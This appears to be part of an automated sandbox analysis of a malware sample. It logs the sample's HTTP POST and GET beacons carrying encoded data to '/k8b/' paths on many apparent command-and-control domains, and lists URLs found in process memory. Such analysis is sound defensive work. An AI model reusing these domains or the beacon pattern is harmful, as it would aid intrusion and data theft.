          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.coin-1234.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.coin-1234.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coin-1234.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 33 66 43 66 76 47 78 57 42 33 71 77 6e 6d 4d 6c 71 30 4a 72 31 49 58 59 4f 34 78 4a 55 69 6d 4b 70 51 76 6e 69 58 69 32 4b 76 6c 4e 72 56 4f 5f 47 34 73 73 77 53 5a 35 45 6b 28 44 55 42 76 75 4c 35 6c 62 53 43 74 43 58 30 28 72 34 6a 4e 6d 62 4b 6b 38 63 74 45 51 74 49 45 72 5a 4d 38 70 69 66 4a 5f 42 63 69 39 31 74 4b 63 4e 44 69 67 4b 72 32 6d 68 73 69 33 6a 72 79 7a 6a 50 44 32 35 43 71 50 44 37 54 2d 37 70 42 48 43 63 56 57 55 4c 72 47 48 5a 6d 32 58 79 65 74 35 4e 56 5f 73 77 73 74 58 31 78 39 67 30 76 54 57 6e 78 39 6a 53 70 58 65 77 42 5f 75 59 75 30 4d 75 69 2d 62 35 4d 38 4c 41 71 49 6e 46 55 48 57 70 48 71 7a 56 4a 6a 55 2d 33 58 35 45 66 52 70 4d 38 6c 67 4d 70 32 5a 70 62 66 30 75 49 61 6d 66 4d 64 4c 4c 74 6a 33 75 52 59 46 4b 46 53 39 4b 64 32 78 4f 6c 59 6f 73 59 68 69 76 76 6b 32 72 71 2d 6c 79 74 75 48 4d 59 63 52 63 59 4e 78 4e 49 68 56 5a 5a 47 4c 6e 76 65 63 62 33 68 75 47 6c 75 4b 41 72 31 77 6a 59 45 68 63 6e 67 79 4f 79 5f 52 33 65 4d 68 50 56 70 32 57 72 72 69 4b 43 66 76 39 63 48 34 39 68 4d 6c 71 45 61 39 4e 36 63 45 37 35 6a 4f 6c 46 50 46 47 6f 77 69 4c 32 59 31 4b 70 4f 78 45 67 67 52 64 65 5a 35 65 6c 66 6f 42 61 4d 79 43 6f 62 72 5f 51 63 54 43 72 76 53 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GZFPC=3fCfvGxWB3qwnmMlq0Jr1IXYO4xJUimKpQvniXi2KvlNrVO_G4sswSZ5Ek(DUBvuL5lbSCtCX0(r4jNmbKk8ctEQtIErZM8pifJ_Bci91tKcNDigKr2mhsi3jryzjPD25CqPD7T-7pBHCcVWULrGHZm2Xyet5NV_swstX1x9g0vTWnx9jSpXewB_uYu0Mui-b5M8LAqInFUHWpHqzVJjU-3X5EfRpM8lgMp2Zpbf0uIamfMdLLtj3uRYFKFS9Kd2xOlYosYhivvk2rq-lytuHMYcRcYNxNIhVZZGLnvecb3huGluKAr1wjYEhcngyOy_R3eMhPVp2WrriKCfv9cH49hMlqEa9N6cE75jOlFPFGowiL2Y1KpOxEggRdeZ5elfoBaMyCobr_QcTCrvSQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.coin-1234.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.coin-1234.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coin-1234.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 33 66 43 66 76 44 41 6c 41 48 75 74 6a 54 6b 67 71 6b 5a 6a 78 49 4b 42 4b 35 51 58 55 30 50 7a 71 44 62 33 69 55 4b 4d 47 4b 4a 6c 76 31 65 5f 45 36 45 76 35 53 5a 36 4e 45 28 63 47 78 79 58 52 75 78 41 53 44 6f 4b 58 30 48 6f 79 46 49 4e 62 61 6b 72 64 4e 4a 6a 36 62 34 4f 5a 50 59 41 6a 35 6f 36 52 4d 7e 39 78 64 69 65 52 32 28 79 44 50 65 70 68 63 7e 79 68 71 4c 6c 6b 5f 28 43 34 68 57 39 56 71 50 38 28 62 64 79 62 35 63 42 44 4d 58 5a 4c 70 79 39 59 52 69 2d 38 71 39 7a 74 79 56 4e 5a 55 77 50 38 30 6e 61 42 67 31 31 6e 6e 5a 75 53 41 78 72 75 62 4f 4f 49 64 33 6d 66 5f 4a 78 4e 79 65 75 7a 67 30 46 54 65 71 74 33 54 6c 65 50 5f 47 44 32 68 37 57 7e 74 42 78 6a 4b 6b 72 58 73 33 73 79 66 30 73 7e 61 77 4c 4b 73 31 56 6f 2d 68 33 4a 72 63 51 79 4c 39 75 79 4e 49 35 73 38 5a 6f 67 76 76 53 7e 35 79 47 67 44 35 70 44 63 70 5f 51 64 52 58 31 64 6b 67 57 62 52 6b 47 6d 72 50 61 71 76 39 67 57 31 61 5a 51 28 71 77 51 46 36 34 4d 6e 6b 6e 39 62 7a 52 33 66 33 68 4f 56 51 31 44 4c 72 6a 59 61 41 69 36 49 78 6f 4e 67 4a 6d 35 73 63 30 65 75 71 45 37 68 6a 50 56 55 55 58 42 38 77 70 4a 7e 62 31 72 70 4f 79 30 67 67 59 39 66 2d 34 63 59 4a 70 67 75 75 79 7a 4d 77 67 59 39 72 66 79 47 4b 4e 6a 42 46 42 65 6c 49 30 57 6f 67 6b 76 32 68 6c 4a 6e 6c 61 77 62 43 28 6f 41 2d 44 57 59 6a 47 7a 4a 6d 66 5a 35 4f 42 52 73 45 75 77 56 4b 4f 49 63 44 75 7a 30 77 4b 6b 55 4e 79 4c 51 36 73 4c 4b 64 70 7a 35 53 4a 4c 43 32 4c 4b 71 73 6a 78 6a 4c 6d 68 49 48 58 42 38 4b 6c 65 47 49 6f 57 56 31 28 63 72 66 45 33 53 6c 42 65 69 6b 30 4c 7a 6c 64 48 6b 5a 7a 62 4e 4f 4a 75 50 67 36 37 39 47 47 33 72 55 4e 46 4e 49 71 5a 4a 49 65 6e 79 36 6d 61 75 39 73 6c 36 5a 67 6a 33 77 78 6b 43 76 65 56 56 51 34 43 61 73 72 33 66 37 46 48 7e 38 59 78 69 75 56 75 4a 2d 49 30 4e 47 37 53 4d 75 76 58 72 68 68 42 44 42 32 75 4b 79 53 6f 36 47 7e 45 42 77 51 37 50 41 59 6d 67 63 44 79 53 32 4f 38 4f 78 6a 42 52 73 59 32 76 33 7a 50 53 41 4e 58 59 7a 68 53 7e 58 55 6b 37 58 7e 45 6e 45 32 68 49 70 43 54 61 52 4c 47 76 39 70 75 54 52 72 49 37 6b 31 47 4d 5f 6f 32 43 46 7e 51 4f 65 4c 75 6b 57 6f 62 4b 55 41 49 4c 30 7a 5f 4b 64 67 66 32 52 6d 61 79 7a 4d 79 49 62 7e 34 62 34 56 39 6a 6d 45 66 56 43 36 61 7e 67 4c 70 49 4e 47 30 46 78 64 48 4a 75 57 64 36 46 34 68 75 64 4d 38 61 76 61 45 7e 65 35 55 59 33 6a 53 77 50 57 42 79 32 54 4d 58 6b 4f 53 74 31 34 45 4a 42 76 6d 78 66 47 58 66 42 37 4e 7e 39 41 7a 58 68 5a 5f 73 61 7a 64 28 68 4f 54 7a 4b 43 53 7e 6f 32 44 6e 6d 41 4f 68 65 42 6c 4f 67 6d 75 56 6a 47 50 66 56 7e 43 56 78 30 43 30 76 74 69 7e 74 51 38 31 77 52 43 79 6
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=l8hWUFLJuml4eYku4/VYU6RSnNDRvqfvURXgu3llAvj/NGacI/RacADph16unSeN08+r&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.cloutmonk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=VC7ph94nBwHqpUSYspNTCN309MDkymEOcmQ6ikEgb4YKagxI1RKoe1AlMLDdw+SPwNPO&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.nastykiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=/9OlxiJfDFCR+kV/3jQOp8a9FKVAShy06VW92GW7Kq51jBaeGYNY0G4LSnjLLhaFT7RV&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.coin-1234.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cloutmonk.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 6c 76 44 6c 6e 68 34 4d 71 6c 63 6f 36 67 43 44 63 31 4f 78 65 62 46 6f 70 58 39 4b 46 47 5f 33 51 31 70 51 66 4f 39 4a 6b 4f 57 46 66 67 70 56 31 76 74 30 6e 4f 73 37 6d 32 49 79 65 65 6c 54 54 53 56 4b 6e 42 6a 6f 66 36 6e 4e 36 58 68 76 52 47 59 6d 6b 28 6b 51 68 4c 45 33 73 79 46 67 59 74 47 62 79 4a 4d 59 44 36 70 62 75 49 35 39 42 52 64 66 79 41 50 47 74 6f 4b 4d 5a 45 63 28 74 7e 62 77 48 68 51 45 59 62 58 48 78 35 6a 6b 53 74 7a 69 30 6e 36 32 77 50 75 69 73 6a 34 66 66 47 4e 59 66 47 72 45 62 73 51 54 53 30 6d 63 74 30 61 6c 36 72 79 68 6c 28 65 57 6f 30 6a 62 6d 50 70 54 49 33 32 75 55 6f 53 7a 73 5a 41 4f 72 79 62 36 51 39 73 47 6e 77 2d 39 32 74 77 58 46 37 79 75 7a 4b 6c 57 72 78 34 56 67 67 38 52 6c 57 73 6c 63 6e 76 38 42 6a 5f 61 63 66 7a 6d 69 45 67 6c 67 67 77 34 75 46 44 62 64 36 52 56 51 74 4a 54 69 50 62 4c 70 66 6a 6a 52 72 74 61 42 54 6f 6c 71 69 47 6f 53 67 78 6e 79 74 76 5a 32 58 45 62 79 68 32 42 6f 79 71 6b 70 7e 59 63 61 65 50 68 6f 43 31 45 77 6c 49 75 63 56 6b 33 79 58 4f 73 51 51 34 43 6c 6b 47 50 30 59 67 7e 50 4b 4e 62 45 78 43 65 4a 33 79 34 50 77 56 79 72 53 31 56 70 31 68 4f 4f 67 45 38 35 77 30 76 55 69 35 39 50 54 38 61 54 69 74 77 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GZFPC=tetsKlvDlnh4Mqlco6gCDc1OxebFopX9KFG_3Q1pQfO9JkOWFfgpV1vt0nOs7m2IyeelTTSVKnBjof6nN6XhvRGYmk(kQhLE3syFgYtGbyJMYD6pbuI59BRdfyAPGtoKMZEc(t~bwHhQEYbXHx5jkStzi0n62wPuisj4ffGNYfGrEbsQTS0mct0al6ryhl(eWo0jbmPpTI32uUoSzsZAOryb6Q9sGnw-92twXF7yuzKlWrx4Vgg8RlWslcnv8Bj_acfzmiEglggw4uFDbd6RVQtJTiPbLpfjjRrtaBTolqiGoSgxnytvZ2XEbyh2Boyqkp~YcaePhoC1EwlIucVk3yXOsQQ4ClkGP0Yg~PKNbExCeJ3y4PwVyrS1Vp1hOOgE85w0vUi59PT8aTitwQ).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 12 Sep 2020 13:04:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 310Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 38 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 61 64 6d 69 6e 40 6c 6f 63 61 6c 68 6f 73 74 2e 63 6f 6d 22 3e 77 77 77 2e 63 6f 69 6e 2d 31 32 33 34 2e 63 6f 6d 3c 2f 61 3e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /k8b/ was not found on this server.</p><hr><address>Apache Server at <a href="mailto:admin@localhost.com">www.coin-1234.com</a> Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.418438199.000000000E1E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398404155.0000000006E30000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000005.00000002.631637082.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com/k8b/www.clickfeminino.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online/k8b/www.fivestarthestud.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.onlineReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.412362534.0000000007C99000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz/k8b/Micr0
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyzReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com/k8b/www.p229pbfc9frm4.net
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com/k8b/www.nastykiki.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.633735755.0000000003EE9000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.633735755.0000000003EE9000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com/k8b/www.aigou898.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com/k8b/www.fundwise.pro
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com/k8b/www.camdio.xyz
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.393239530.00000000052EE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.393239530.00000000052EE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaH
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.371673013.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366500402.00000000052EB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366349990.00000000011ED000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnC
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.pro/k8b/www.alriyadh-ksa.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fundwise.proReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.com/k8b/www.xn--ucko5bzcwf3b2c.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.infi88.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)jl-
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367808589.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/1
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3j:l-
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ej$l
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367879513.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Nj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0P
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Nj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.368445636.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rj
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.367879513.00000000052E8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sk-s
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.com/k8b/www.dancoimage.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.lamparacuerda.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.online/k8b/www.lamparacuerda.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.mensajera-radio.onlineReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.com/k8b/www.coin-1234.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.nastykiki.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.p229pbfc9frm4.net/k8b/www.salestalentforhire.com
